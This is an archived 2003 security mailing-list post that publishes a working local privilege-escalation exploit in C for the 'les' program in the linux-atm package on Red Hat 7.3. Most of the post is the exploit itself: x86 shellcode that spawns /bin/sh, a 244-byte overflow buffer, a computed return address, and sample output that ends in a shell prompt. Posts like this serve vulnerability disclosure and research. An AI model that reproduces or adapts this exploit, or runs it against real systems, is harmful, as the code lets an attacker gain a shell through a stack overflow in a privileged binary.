ATM on linux Exploit(les,local)

From: axis ph4nt0m (axisat_private)
Date: Sat May 24 2003 - 22:19:32 PDT

Next message: Helmut Springer: "Re: BEA WebLogic"

Previous message: bugzillaat_private: "[Full-Disclosure] [RHSA-2003:171-01] Updated CUPS packages fix denial of service attack"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

('binary' encoding is not supported, stored as-is) /* ATM on linux Exploit *** vulnerability discovered by Angelo Rosiello *** sorry for my poor english. *** i wrote this exploit just for fun. *** i can't get a rootshell on my linux :( *** tested on redhat7.3 ,other linux maybe OK,too. *** atm package:linux-atm-2.4.0-1.i386.rpm *** http://sourceforge.net/projects/linux-atm *** *** Here is another exploit by Angelo Rosiello *** But i can't get shell with this code *** http://www.securiteam.com/exploits/5EP0M1P9PO.html *************************************************** Buffer is 244 bytes using 244+4 bytes to overwrite eip. *************************************************** *** AUTOR:@Xis2(ph4nt0m) *** CONTACT:axisat_private *** COPYRIGHT (c) 2003 PH4NT0M SECURITY *** http://www.ph4nt0m.net *** 2003.5.15 *************************************************** [tt@PH4NT0M explab]$ gcc -o linux_atm myatm.c [tt@PH4NT0M explab]$ ./linux_atm **************************************** linux-atm exploit! Coded by @Xis2(ph4nt0m) Welcome to http://www.ph4nt0m.net Jump to 0xbffffa5c **************************************** DEBUG: Log opened NOTE: Configuration file: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAA?? sh-2.05a$ *************************************************** */ #include<stdio.h> #include<stdlib.h> #include<unistd.h> #define BSIZE 244 /* linux x86 shellcode by bob from dtors.net,23 bytes */ char shellcode[]="\x31\xc0\x50\x68\x6e\x2f\x73\x68" "\x68\x2f\x2f\x62\x69\x89\xe3\x50" "\x53\x89\xe1\xb0\x0b\xcd\x80"; int main(int argc,char *argv[]){ char buf[BSIZE+10]; char *prog[]={"/usr/local/sbin/les","-f",buf,NULL}; char *env[]={"HOME=/root",shellcode,NULL}; unsigned long ret; printf("****************************************\n\n"); printf("Linux-atm exploit!\n\n"); printf("Coded by @Xis2(ph4nt0m)\n"); printf("Welcome to http://www.ph4nt0m.net\n\n"); printf("Jump to 0x%08x\n",&ret); printf("****************************************\n\n\n"); /* calculate the shellcode address */ ret=0xc0000000-sizeof(void *)-strlen(prog[0])-strlen(shellcode)-0x02; /* construct our evil buffer */ memset(buf,0x41,sizeof(buf)); memcpy(buf+BSIZE+4,(char *)&ret,4); buf[BSIZE+8]=0x00; execve(prog[0],prog,env); return 0; }

Next message: Helmut Springer: "Re: BEA WebLogic"
Previous message: bugzillaat_private: "[Full-Disclosure] [RHSA-2003:171-01] Updated CUPS packages fix denial of service attack"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This archive was generated by hypermail 2b30 : Tue May 27 2003 - 11:32:37 PDT